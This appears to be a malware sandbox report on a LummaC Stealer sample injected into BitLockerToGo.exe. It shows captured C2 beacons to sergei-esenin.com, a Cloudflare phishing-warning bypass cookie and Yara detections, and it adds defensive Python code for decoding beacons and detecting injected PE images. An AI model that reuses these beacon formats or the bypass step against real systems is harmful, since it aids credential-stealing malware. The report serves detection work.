Session ID: 1 | Source IP: 192.168.2.7 | Source Port: 49708 | Destination IP: 104.102.49.254 | Destination Port: 443 | PID: 1568 | Process: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-13 19:34:54 UTC | 219 | OUT | GET /profiles/76561199724331900 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: steamcommunity.com
2024-10-13 19:34:55 UTC | 1870 | IN | HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Date: Sun, 13 Oct 2024 19:34:55 GMT
Content-Length: 34837
Connection: close
Set-Cookie: sessionid=b2c26a1103d97c5dd06069b2; Path=/; Secure; SameSite=None
Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
2024-10-13 19:34:55 UTC | 14514 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-10-13 19:34:55 UTC | 16384 | IN | Data Raw: 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 09 09 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0d 0a 09 09 09 24 28 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 27 29 2e 76 5f 74 6f 6f 6c 74 69 70 28 7b 27 6c 6f 63 61 74 69 6f 6e 27 3a 27 62 6f 74 74 6f 6d 27 2c 20 27 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f
Data Ascii: <script type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#glo
2024-10-13 19:34:55 UTC | 3768 | IN | Data Raw: 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 73 75 6d 6d 61 72 79 5f 66 6f 6f 74 65 72 22 3e 0d 0a 09 09 09 09 09 09 09 3c 73 70 61 6e 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29
Data Ascii: <div class="profile_summary_footer"><span data-panel="{&quot;focusable&quot;:true,&quot;clickOnActivate&quot;:true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function()
2024-10-13 19:34:55 UTC | 171 | IN | Data Raw: 09 3c 73 70 61 6e 3e 56 69 65 77 20 6d 6f 62 69 6c 65 20 77 65 62 73 69 74 65 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 0d 0a 09 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
Data Ascii: <span>View mobile website</span></div></div></div></div>... responsive_page_content --></div>... responsive_page_frame --></body></html>


Session ID: 2 | Source IP: 192.168.2.7 | Source Port: 49709 | Destination IP: 104.21.53.8 | Destination Port: 443 | PID: 1568 | Process: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-13 19:34:56 UTC | 264 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: sergei-esenin.com
2024-10-13 19:34:56 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-10-13 19:34:56 UTC | 557 | IN | HTTP/1.1 200 OK
Date: Sun, 13 Oct 2024 19:34:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4EKyhjQDxaiUT0%2FTXyPZl9C1Vb5iPvLuyzkBKi6RSm59q%2BLIy4Og1kzlsSoPQrHdOZBBhlyLGfN8tL7lH5h22WtAaDuNa%2FWQ4X8mRm37DhIoX%2BrYVOxIiX7Uhr9%2FALJqvhBnkw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8d21c5190de20c7e-EWR
2024-10-13 19:34:56 UTC | 812 | IN | Data Raw: 31 31 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
Data Ascii: 1151<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-10-13 19:34:56 UTC | 1369 | IN | Data Raw: 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64
Data Ascii: tyles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById
2024-10-13 19:34:56 UTC | 1369 | IN | Data Raw: 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 2f 63 64 6e 2d 63 67 69 2f 70 68 69 73 68 2d 62 79 70 61 73 73 22 20 6d 65 74 68 6f 64 3d 22 47 45 54 22 20 65 6e 63 74 79 70 65 3d 22 74 65 78 74 2f 70 6c 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
Data Ascii: anagement/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain">
2024-10-13 19:34:56 UTC | 891 | IN | Data Raw: 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d
Data Ascii: > <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id=
2024-10-13 19:34:56 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 3 | Source IP: 192.168.2.7 | Source Port: 49712 | Destination IP: 104.21.53.8 | Destination Port: 443 | PID: 1568 | Process: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-13 19:34:56 UTC | 354 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Cookie: __cf_mw_byp=_jIYC2pQ1pswVVaeyx4n19P1ZvDbEX.5r1GxGZkKCpE-1728848096-0.0.1.1-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 47
Host: sergei-esenin.com
2024-10-13 19:34:56 UTC | 47 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 58 57 56 6e 56 42 2d 2d 6c 61 6e 64 31 26 6a 3d
Data Ascii: act=recive_message&ver=4.0&lid=XWVnVB--land1&j=
2024-10-13 19:34:57 UTC | 831 | IN | HTTP/1.1 200 OK
Date: Sun, 13 Oct 2024 19:34:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=qe8amrtfifoqtret40pep0m4u3; expires=Thu, 06 Feb 2025 13:21:36 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZhyevlOcFNqjq7qOzGa93JMBr0OCjNz%2Fg%2FoPF%2FKTPqwTvGgX6ElZhuQqQ7aaD0URr57weuGTsWoc46jHstRDRcSzADhY%2B09jQBE%2B5OTTTUyb13GB0N83gpNhMDhWQmBwZeFJ8A%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8d21c51eae29433f-EWR
alt-svc: h3=":443"; ma=86400
2024-10-13 19:34:57 UTC | 15 | IN | Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
Data Ascii: aerror #D12
2024-10-13 19:34:57 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
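
The three sessions above are the injected BitLockerToGo.exe process talking to its infrastructure: a Steam profile fetch, then two form POSTs to sergei-esenin.com/api. The first POST (act=life) is answered not by the C2 backend but by Cloudflare's phishing-warning interstitial (the HTML in session 2 contains the /cdn-cgi/phish-bypass form); the second POST repeats the beacon with the __cf_mw_byp bypass cookie attached and reaches the PHP backend, which sets PHPSESSID and answers a chunked body. The "Data Ascii" rendering "aerror #D12" fuses the chunk-size line ("a", 10 bytes) with the body, which is just "error #D12". The following is an added example, not Joe Sandbox or LummaC code: it decodes the "Data Raw" rows, un-chunks the response and flags the beacon pattern the report shows. The SESSIONS table, the BROWSERS allow-list and the finding labels are constructed for the example; the request lines, headers and hex bodies are copied from the rows above. Public LummaC reporting describes the Steam profile fetch as a dead-drop lookup for the C2 domain, but this report only shows the fetch, so the example flags it for triage rather than asserting that.

```python
"""Decode the captured HTTP exchanges of this report and flag the LummaC
C2 beacon pattern they show.

Added example, not Joe Sandbox or LummaC code. SESSIONS is constructed from
the values printed in the report (PID 1568, BitLockerToGo.exe); names such
as classify(), c2_iocs() and the finding labels are this example's own.
"""
import re
from urllib.parse import parse_qs

PROC = r"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

# "Data Raw" rows copied from the report: the chunked response body of
# sessions 0 and 3, and the two POST bodies sent to sergei-esenin.com.
CHUNKED_ERROR_D12 = "61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a 30 0d 0a 0d 0a"
LIFE_BODY = "61 63 74 3d 6c 69 66 65"
BEACON_BODY = ("61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d "
               "34 2e 30 26 6c 69 64 3d 58 57 56 6e 56 42 2d 2d 6c 61 6e 64 31 26 6a 3d")

# Constructed session table:
# (session id, destination ip, process, request line, headers, body hex)
SESSIONS = [
    (1, "104.102.49.254", PROC, "GET /profiles/76561199724331900 HTTP/1.1",
     {"Host": "steamcommunity.com"}, ""),
    (2, "104.21.53.8", PROC, "POST /api HTTP/1.1",
     {"Host": "sergei-esenin.com",
      "Content-Type": "application/x-www-form-urlencoded"}, LIFE_BODY),
    (3, "104.21.53.8", PROC, "POST /api HTTP/1.1",
     {"Host": "sergei-esenin.com",
      "Content-Type": "application/x-www-form-urlencoded",
      "Cookie": "__cf_mw_byp=_jIYC2pQ1pswVVaeyx4n19P1ZvDbEX.5r1GxGZkKCpE-1728848096-0.0.1.1-/api"},
     BEACON_BODY),
]

# act= values seen in this report. The misspelling "recive" is the malware's
# own and is a useful literal to hunt for; do not "correct" it.
LUMMA_ACTS = {"life", "recive_message"}
# Assumed allow-list of processes that legitimately fetch Steam profile pages.
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "steam.exe", "steamwebhelper.exe"}


def decode_raw(hex_row: str) -> bytes:
    """Turn a 'Data Raw' row ('61 0d 0a ...') back into bytes."""
    return bytes.fromhex(hex_row)


def dechunk(data: bytes) -> bytes:
    """Decode an HTTP/1.1 chunked body.

    Stops at the zero-length terminating chunk, or at the end of a truncated
    capture (returning whatever was received so far).
    """
    out = bytearray()
    pos = 0
    while True:
        eol = data.find(b"\r\n", pos)
        if eol < 0:
            break
        size_field = data[pos:eol].split(b";", 1)[0].strip()   # drop chunk extensions
        if not size_field:
            break
        size = int(size_field, 16)
        if size == 0:
            break                                               # last chunk
        body = eol + 2
        out += data[body:body + size]
        pos = body + size + 2                                   # skip the chunk's closing CRLF
    return bytes(out)


def parse_form(body: bytes) -> dict:
    """x-www-form-urlencoded body -> {key: value}, keeping empty values like 'j='."""
    parsed = parse_qs(body.decode("ascii", "replace"), keep_blank_values=True)
    return {k: v[0] for k, v in parsed.items()}


def classify(session) -> dict:
    """Return the session's host, destination, process and a list of finding labels."""
    sid, dst, process, request_line, headers, body_hex = session
    method, path, _ = request_line.split(" ", 2)
    host = headers.get("Host", "")
    form = parse_form(decode_raw(body_hex)) if body_hex else {}
    exe = process.rsplit("\\", 1)[-1].lower()
    findings = []

    # LummaC beacon as captured here: form POST to /api carrying act=<verb>.
    if method == "POST" and path == "/api" and form.get("act") in LUMMA_ACTS:
        findings.append(f"lummac_c2_beacon act={form['act']}")
    if "lid" in form:                                   # build / campaign identifier
        findings.append(f"lummac_lid={form['lid']}")
    # Session 3 replays the POST with Cloudflare's phishing-warning bypass cookie,
    # which the stealer obtained after session 2 was served the interstitial.
    if "__cf_mw_byp=" in headers.get("Cookie", ""):
        findings.append("cloudflare_phishing_warning_bypass_cookie")
    # A Steam profile fetched by something that is neither a browser nor Steam
    # is worth triage on its own.
    if (host == "steamcommunity.com" and re.fullmatch(r"/profiles/\d+", path)
            and exe not in BROWSERS):
        findings.append("steam_profile_fetch_from_non_browser")
    return {"session": sid, "host": host, "dst": dst, "process": exe, "findings": findings}


def c2_iocs(sessions) -> dict:
    """Hosts, IPs and lid values that carried a LummaC beacon, for blocking and hunting."""
    hosts, ips, lids = set(), set(), set()
    for s in sessions:
        r = classify(s)
        if any(f.startswith("lummac_c2_beacon") for f in r["findings"]):
            hosts.add(r["host"])
            ips.add(r["dst"])
        lids.update(f.split("=", 1)[1] for f in r["findings"] if f.startswith("lummac_lid="))
    return {"hosts": hosts, "ips": ips, "lids": lids}


if __name__ == "__main__":
    print("chunked body decodes to:", dechunk(decode_raw(CHUNKED_ERROR_D12)))
    for s in SESSIONS:
        print(classify(s))
    print(c2_iocs(SESSIONS))
```

Feeding a real capture through this means building the session tuples from the sandbox export (or from a proxy log) instead of the literals here; the matching logic stays the same. The Host header and destination IP are reported separately because the C2 sits behind Cloudflare, so 104.21.53.8 is a shared edge address and the domain is the better indicator.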


                                                                                                                                                          Target ID:0
                                                                                                                                                          Start time:15:34:39
                                                                                                                                                          Start date:13/10/2024
                                                                                                                                                          Path:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe"
                                                                                                                                                          Imagebase:0x1d0000
                                                                                                                                                          File size:41'135'106 bytes
                                                                                                                                                          MD5 hash:DE577C633508C2BC5E7BE2AD04BF34F3
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
• Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.1596179225.0000000001558000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000002.1596179225.0000000001558000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
Reputation: low
Has exited: true

Target ID: 2
Start time: 15:34:48
Start date: 13/10/2024
Path: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Imagebase: 0xd90000
File size: 231'736 bytes
MD5 hash: A64BEAB5D4516BECA4C40B25DC0C1CD8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation: moderate
Has exited: true
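An added check, not part of the Joe Sandbox report and not the sample's code, that turns the process record above into a detection: BitLockerToGo.exe is loaded at Imagebase 0xd90000, yet its LummaC Yara hit is in a dump at 0x400000 whose file name carries the field 00000040. Reading that field as the region protection (an assumption about the .sdmp naming scheme) gives PAGE_EXECUTE_READWRITE, so the stealer sits as a second PE in writable, executable memory that the loader never mapped. The function below applies that test to a list of regions (constructed here to mirror the two dumps; on a live host they would come from VirtualQueryEx and ReadProcessMemory) and also covers the hollowing variant, where the foreign PE lands at the image base itself but in private memory.

```python
"""Flag PE images that the loader did not map: the injection pattern in this report."""
import struct
from dataclasses import dataclass

# winnt.h memory protection and type constants
PAGE_READWRITE = 0x04
PAGE_EXECUTE_READ = 0x20
PAGE_EXECUTE_READWRITE = 0x40
MEM_PRIVATE = 0x20000
MEM_IMAGE = 0x1000000
_EXEC_MASK = 0x10 | 0x20 | 0x40 | 0x80   # PAGE_EXECUTE, _READ, _READWRITE, _WRITECOPY
_WRITE_MASK = 0x04 | 0x08 | 0x40 | 0x80  # PAGE_READWRITE, _WRITECOPY and their EXECUTE_ forms


@dataclass(frozen=True)
class Region:
    """One committed region, as VirtualQueryEx plus ReadProcessMemory would report it."""
    base: int
    protect: int
    mem_type: int
    data: bytes


def constructed_pe(size: int = 0x400) -> bytes:
    """Constructed stand-in header (not the sample): MZ, e_lfanew at 0x3C, PE\\0\\0 at that offset."""
    buf = bytearray(size)
    buf[0:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x80)
    buf[0x80:0x84] = b"PE\0\0"
    return bytes(buf)


def has_pe_header(data: bytes) -> bool:
    """True if data begins with an MZ header whose e_lfanew points at a PE signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return e_lfanew + 4 <= len(data) and data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def classify(region: Region, image_base: int) -> list:
    """Findings for one region; an empty list means nothing to report."""
    findings = []
    if region.protect & _EXEC_MASK and region.protect & _WRITE_MASK:
        findings.append("rwx")  # writable and executable at the same time
    # Loader-mapped modules (main image and DLLs) are MEM_IMAGE. A PE header in any other
    # memory type was written there by code inside the process: manually mapped or injected.
    if region.mem_type != MEM_IMAGE and has_pe_header(region.data):
        # At the image base itself this is hollowing (original section unmapped, private
        # memory allocated in its place); anywhere else it is a second, injected PE.
        findings.append("hollowed-image" if region.base == image_base else "injected-pe")
    return findings


def scan(regions, image_base: int) -> dict:
    """Map region base -> findings, keeping only regions with at least one finding."""
    hits = {}
    for region in regions:
        findings = classify(region, image_base)
        if findings:
            hits[region.base] = findings
    return hits


# Constructed regions modelled on the report: the legitimate image at 0xd90000, the
# LummaC PE at 0x400000 in RWX private memory, and an ordinary RW heap region.
BITLOCKERTOGO_IMAGE_BASE = 0xD90000
REGIONS = [
    Region(0xD90000, PAGE_EXECUTE_READ, MEM_IMAGE, constructed_pe()),
    Region(0x400000, PAGE_EXECUTE_READWRITE, MEM_PRIVATE, constructed_pe()),
    Region(0x1558000, PAGE_READWRITE, MEM_PRIVATE, b"\x00" * 0x400),
]

if __name__ == "__main__":
    for base, findings in scan(REGIONS, BITLOCKERTOGO_IMAGE_BASE).items():
        print(f"{base:#010x}: {', '.join(findings)}")
```

MEM_IMAGE regions are skipped so ordinary DLLs, which also carry MZ/PE headers at addresses other than the main image base, do not trip the check. RWX is reported on its own because a staged payload can be written RW and flipped to RX before it runs, in which case only the PE-in-private-memory finding remains.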


Execution Graph

Execution Coverage: 2.6%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 47.3%
Total number of Nodes: 110
Total number of Limit Nodes: 20

[Execution graph rendered interactively in the original report; the node/edge dump is omitted. Main path from the entry node 0x40a9a0: GetCurrentProcess, GetWindowInfo, then 0x40b810 (CoInitializeEx, CoInitializeSecurity) into 0x4365e0 (CoCreateInstance); the alternative branch at 0x40a9b7 calls ExitProcess. Other Windows APIs in the graph: CoSetProxyBlanket, SysAllocString, SysFreeString, SysStringLen, VariantInit, VariantClear, GetVolumeInformationW, GetUserDefaultUILanguage, GetSystemDirectoryW, RtlAllocateHeap, RtlReAllocateHeap, RtlFreeHeap, LdrInitializeThunk, FreeLibrary.]

Control-flow Graph

[Rendered interactively in the original report; the executed/not-executed edge list is omitted. Function 0x43681d-0x436ed1: Windows API calls SysAllocString (2), VariantInit, SysStringLen, VariantClear, SysFreeString (3), GetVolumeInformationW; internal calls 0x40a300, 0x40a310, 0x43e080.]

APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Yara matches
Similarity
• API ID: String$Alloc$InitVariant
• String ID: YmC$rnC
• API String ID: 3520221836-3969294163
